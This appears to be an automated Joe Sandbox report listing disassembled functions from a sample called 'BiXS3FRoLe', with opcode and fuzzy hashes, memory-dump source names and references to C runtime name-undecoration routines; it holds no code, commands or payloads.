                                                                                                        • Instruction ID: 2ab78dfb910ed2fffcf7b28b3e6551ef18dfc8731d505fda20da8e773ee828b9
                                                                                                        • Opcode Fuzzy Hash: b712166386aa8c67017c73479d5a6b6bd2e7c504b4333dc3fcd8a0828dd31965
                                                                                                        • Instruction Fuzzy Hash: E7C17475900215DFDB28CF98C494ABAB7B1FF4C318F5A81BED90A6F746CA306941CB94
                                                                                                        Function 00AD81A0 Relevance: .2, Instructions: 205COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9334b3e7bc1a736629855850d90b8811e2b7170aef3660bb0d10393c6ae5cfae
                                                                                                        • Instruction ID: 7bbcc95234c278f92adf3964d316dd434daba91213a861b253bf69398d6bfc7d
                                                                                                        • Opcode Fuzzy Hash: 9334b3e7bc1a736629855850d90b8811e2b7170aef3660bb0d10393c6ae5cfae
                                                                                                        • Instruction Fuzzy Hash: F3917E3190879A8BC710CF3CC5815AEF7E0BFD8348F459B5EE895A7212EB34B9858B41
                                                                                                        Function 00AB0E00 Relevance: .2, Instructions: 183COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1a01076211383f58cc85f12ca07628130e8e4be89cf2fa5760a5f697b6e39385
                                                                                                        • Instruction ID: eff71ffdaad2bcf7939c036e16fa202e0b991db34cc817dbd3fc906a3d11fd13
                                                                                                        • Opcode Fuzzy Hash: 1a01076211383f58cc85f12ca07628130e8e4be89cf2fa5760a5f697b6e39385
                                                                                                        • Instruction Fuzzy Hash: 9461DC72E002299FDB08CFE9C89069EF7F6BB88310F5A817ED515F7340D6B45A119B94
                                                                                                        Function 00A78A80 Relevance: .2, Instructions: 169COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bb278fcbab84e79844a6bb326d706370cb0841fbcbdcc7f1db53f34160a87449
                                                                                                        • Instruction ID: 1690a5ca094b902b93a52e29c8e708b1635dc7e3c3cf4504ca87f4e6016675df
                                                                                                        • Opcode Fuzzy Hash: bb278fcbab84e79844a6bb326d706370cb0841fbcbdcc7f1db53f34160a87449
                                                                                                        • Instruction Fuzzy Hash: 55617071E006199FDB18DF69C8847AEF7F5FF48310F148269D929A7380DB78A9058BE0
                                                                                                        Function 00AD4FA7 Relevance: .2, Instructions: 154COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: bbc7dcca5fb21b1d780ea2455a71dc5655a3cdeff3e7a7c54337a88c26725de1
                                                                                                        • Instruction ID: 5d5f110f66bc5ce451a7ccb1f50e2f835457bf563d994d63b608919812f8b62b
                                                                                                        • Opcode Fuzzy Hash: bbc7dcca5fb21b1d780ea2455a71dc5655a3cdeff3e7a7c54337a88c26725de1
                                                                                                        • Instruction Fuzzy Hash: FD514272D1C4B814EB1D427E48723FDBEF29B85202F0E82EAD9A3667D9C53943069B50
                                                                                                        Function 00AE48D0 Relevance: .2, Instructions: 152COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7f4bd42cfd9eb192761cb6ca9ad15c1eb5602e5bb8b1c31f7f3d5cf6e0c39460
                                                                                                        • Instruction ID: 0abfed6a49c0a07d6009875bff1021458b10984b4e7787e4663ecaeb24d29306
                                                                                                        • Opcode Fuzzy Hash: 7f4bd42cfd9eb192761cb6ca9ad15c1eb5602e5bb8b1c31f7f3d5cf6e0c39460
                                                                                                        • Instruction Fuzzy Hash: 1161AD55C18FD846E7038B3D98422E6B3A0BFFA299F18D746FDA436132EB21B6C55310
                                                                                                        Function 00AD4FB4 Relevance: .1, Instructions: 147COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: de27e06f2a39b23eb8ae741f348f2a15afde0b07a50070670832938456a0f7b6
                                                                                                        • Instruction ID: e0f8da9cee18320c4c9eb9a8238dc3c035d206add2158abeb83e0a1acf255fc3
                                                                                                        • Opcode Fuzzy Hash: de27e06f2a39b23eb8ae741f348f2a15afde0b07a50070670832938456a0f7b6
                                                                                                        • Instruction Fuzzy Hash: 59512371D1C4B814EB5D427E48B22FDBDF39B85202F0E81EAD5A3A67D9C53943069B50
                                                                                                        Function 00ADD2C6 Relevance: .1, Instructions: 141COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3785d1aba6a0b3de4b733dd2f1260e456c2e8fd87cc52f51b4a1577b6e1c63f3
                                                                                                        • Instruction ID: aa11d9397b75ba0f54b8aba73cb4f1a1a9e07bcc8630b48fe0a85b733d98bc11
                                                                                                        • Opcode Fuzzy Hash: 3785d1aba6a0b3de4b733dd2f1260e456c2e8fd87cc52f51b4a1577b6e1c63f3
                                                                                                        • Instruction Fuzzy Hash: 2C514652648F6991D72A0B3DD4912F3E3D1AFD530AF01C70EEDE565647E732E208B690
                                                                                                        Function 00AD8440 Relevance: .1, Instructions: 140COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 429268e0d945208024015d5d37289875e398da387f10c2fe598760821bc4320b
                                                                                                        • Instruction ID: b100de1a58538a3d85e35dc7e80680a77e3cf459e61813b34beb8fc66f37bb88
                                                                                                        • Opcode Fuzzy Hash: 429268e0d945208024015d5d37289875e398da387f10c2fe598760821bc4320b
                                                                                                        • Instruction Fuzzy Hash: 7751F232D047898BD711CF3CC5856A9B3A0BFE9348F19C75AD8856B217EB30B6898700
                                                                                                        Function 00AB0080 Relevance: .1, Instructions: 124COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                                                                                        • Instruction ID: 1e9b07d564fe1c900b59a9c56ff74c1136568e868d998312ac7df6c9dfae3ee1
                                                                                                        • Opcode Fuzzy Hash: 27398a6bd04e7b042c2df0dd4eefd57469496f7df0cf8f294bdbd0d9e34c2454
                                                                                                        • Instruction Fuzzy Hash: 7341A2327215128BD708CF3DC895BA6F7E5FB98310F158769E42ACB2C2DB35E9108B84
                                                                                                        Function 00AE4110 Relevance: .1, Instructions: 117COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8823ce6f08d49e212022aed1a05e9cffe4dc0536a4605498ad7ee7ed4330dc5f
                                                                                                        • Instruction ID: f10ec451a69faa747db9d3f146422314172ab15981148f212458ff6fbfcafd99
                                                                                                        • Opcode Fuzzy Hash: 8823ce6f08d49e212022aed1a05e9cffe4dc0536a4605498ad7ee7ed4330dc5f
                                                                                                        • Instruction Fuzzy Hash: 945123B1A087018FD325CF28D491A5AB7F4FF9D304B548A2EE49ADB610E730FA45CB85
                                                                                                        Function 00AE4B70 Relevance: .1, Instructions: 111COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 40a7fc57c80b7e8d53dd0e9a18a31d8bc4b463554dd35015f19d48620d764293
                                                                                                        • Instruction ID: fd6c3f9923ad998c28112cb022c8414598cf4b0a6262d583ea4937c61fe72da7
                                                                                                        • Opcode Fuzzy Hash: 40a7fc57c80b7e8d53dd0e9a18a31d8bc4b463554dd35015f19d48620d764293
                                                                                                        • Instruction Fuzzy Hash: E04162CAC29F9C06E513A73558821D1E690AFFB4ED224E387FC7475672E712B5E52320
                                                                                                        Function 00ADD557 Relevance: .1, Instructions: 80COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 29c9d7e43dfe805d176ee8a0da5108ee633dbb35ea7e4490e5854e383a146dea
                                                                                                        • Instruction ID: 1445a963c69c76c7cc27a31e691902624734c9ab290ff609cb86a5155a077a11
                                                                                                        • Opcode Fuzzy Hash: 29c9d7e43dfe805d176ee8a0da5108ee633dbb35ea7e4490e5854e383a146dea
                                                                                                        • Instruction Fuzzy Hash: 60314D67806F5991C713AB3D84072B3E3E2EFD4216F26C74DE9D666306FB35A348A210
                                                                                                        Function 00B18FE0 Relevance: .1, Instructions: 76COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction ID: 2055c343859a8b33f8744c7f1061cc9a6e48e52876d24c58fe5e51ee7d06d49b
                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                        • Instruction Fuzzy Hash: 5011C8B72004C147D6198A2DD8BC5F7A7D5EBCD321BED43FAD0828B758D623AAC59504
                                                                                                        Function 00B1E27D Relevance: 88.0, APIs: 47, Strings: 3, Instructions: 478COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1E2F3
                                                                                                          • Part of subcall function 00B1B218: DName::doPchar.LIBVCRUNTIME ref: 00B1B23F
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E302
                                                                                                          • Part of subcall function 00B1B55A: DName::operator+=.LIBVCRUNTIME ref: 00B1B570
                                                                                                        • DName::operator+=.LIBVCRUNTIME ref: 00B1E622
                                                                                                        • UnDecorator::getSignedDimension.LIBCMT ref: 00B1E62B
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E639
                                                                                                        • DName::operator+=.LIBVCRUNTIME ref: 00B1E642
                                                                                                        • UnDecorator::getSignedDimension.LIBCMT ref: 00B1E64B
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E659
                                                                                                        • DName::operator+=.LIBVCRUNTIME ref: 00B1E662
                                                                                                        • UnDecorator::getSignedDimension.LIBCMT ref: 00B1E66B
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E679
                                                                                                        • DName::operator+=.LIBVCRUNTIME ref: 00B1E682
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E69B
                                                                                                        • DName::operator+=.LIBVCRUNTIME ref: 00B1E6A4
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E6B1
                                                                                                        • UnDecorator::getDataType.LIBVCRUNTIME ref: 00B1E6C0
                                                                                                          • Part of subcall function 00B1D416: DName::DName.LIBVCRUNTIME ref: 00B1D422
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E6E8
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E73A
                                                                                                        • DName::operator+=.LIBCMT ref: 00B1E6D8
                                                                                                          • Part of subcall function 00B1B623: DName::DName.LIBVCRUNTIME ref: 00B1B63D
                                                                                                        • DName::operator=.LIBVCRUNTIME ref: 00B1E2E0
                                                                                                          • Part of subcall function 00B1B451: DName::doPchar.LIBVCRUNTIME ref: 00B1B470
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1E344
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E350
                                                                                                        • DName::operator+=.LIBVCRUNTIME ref: 00B1E35C
                                                                                                        • DName::operator+=.LIBCMT ref: 00B1E372
                                                                                                        • DName::operator+=.LIBCMT ref: 00B1E37C
                                                                                                        • UnDecorator::getZName.LIBVCRUNTIME ref: 00B1E3B5
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1E3DD
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E3EC
                                                                                                        • DName::operator+=.LIBVCRUNTIME ref: 00B1E40C
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1E423
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1E49D
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1E4C2
                                                                                                        • UnDecorator::getStringEncoding.LIBVCRUNTIME ref: 00B1E502
                                                                                                        • UnDecorator::getStringEncoding.LIBVCRUNTIME ref: 00B1E542
                                                                                                        • DName::operator=.LIBVCRUNTIME ref: 00B1E59D
                                                                                                        • DName::operator+.LIBCMT ref: 00B1E5B5
                                                                                                        • DName::operator=.LIBVCRUNTIME ref: 00B1E5DE
                                                                                                        • DName::operator=.LIBVCRUNTIME ref: 00B1E88E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Name::operator+Name::operator+=$Name$Name::$Decorator::get$Name::operator=$DimensionSigned$EncodingName::doPcharString$DataType
                                                                                                        • String ID: `anonymous namespace'$`string'$operator
                                                                                                        • API String ID: 2067090289-815891235
                                                                                                        • Opcode ID: 72f0ac26ee613d3c575e619c50fb905254b33bf5cf1044e8df0d3f922345f32e
                                                                                                        • Instruction ID: 44f020cba4e74cdd6fa90ed0273a7851ed811c208a543fab102d0e9bc2de850d
                                                                                                        • Opcode Fuzzy Hash: 72f0ac26ee613d3c575e619c50fb905254b33bf5cf1044e8df0d3f922345f32e
                                                                                                        • Instruction Fuzzy Hash: 6F02A1708042099EDF19DFA4D895EFEBBF5EF19300F90049AE961A7291DB70DAC5CB60
                                                                                                        Function 00B1DCB0 Relevance: 58.9, APIs: 39, Instructions: 351memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1DD60
                                                                                                        • DName::operator+.LIBCMT ref: 00B1DD6F
                                                                                                        • UnDecorator::getScope.LIBVCRUNTIME ref: 00B1DD8E
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1DD9B
                                                                                                        • DName::operator+.LIBCMT ref: 00B1DDA7
                                                                                                        • DName::operator+.LIBCMT ref: 00B1DDB7
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1DDCB
                                                                                                        • DName::operator+.LIBCMT ref: 00B1DDDA
                                                                                                        • UnDecorator::getThisType.LIBVCRUNTIME ref: 00B1DE23
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1DE5B
                                                                                                        • DName::operator+.LIBCMT ref: 00B1DE67
                                                                                                        • DName::operator+.LIBCMT ref: 00B1DE77
                                                                                                        • UnDecorator::getThisType.LIBVCRUNTIME ref: 00B1DE89
                                                                                                          • Part of subcall function 00B1FC2E: UnDecorator::getDataIndirectType.LIBVCRUNTIME ref: 00B1FC54
                                                                                                        • DName::operator|=.LIBCMT ref: 00B1DE93
                                                                                                        • DName::DName.LIBVCRUNTIME ref: 00B1DE9F
                                                                                                        • DName::operator+.LIBCMT ref: 00B1DEAD
                                                                                                          • Part of subcall function 00B1B55A: DName::operator+=.LIBVCRUNTIME ref: 00B1B570
                                                                                                        • DName::operator+.LIBCMT ref: 00B1DEE7
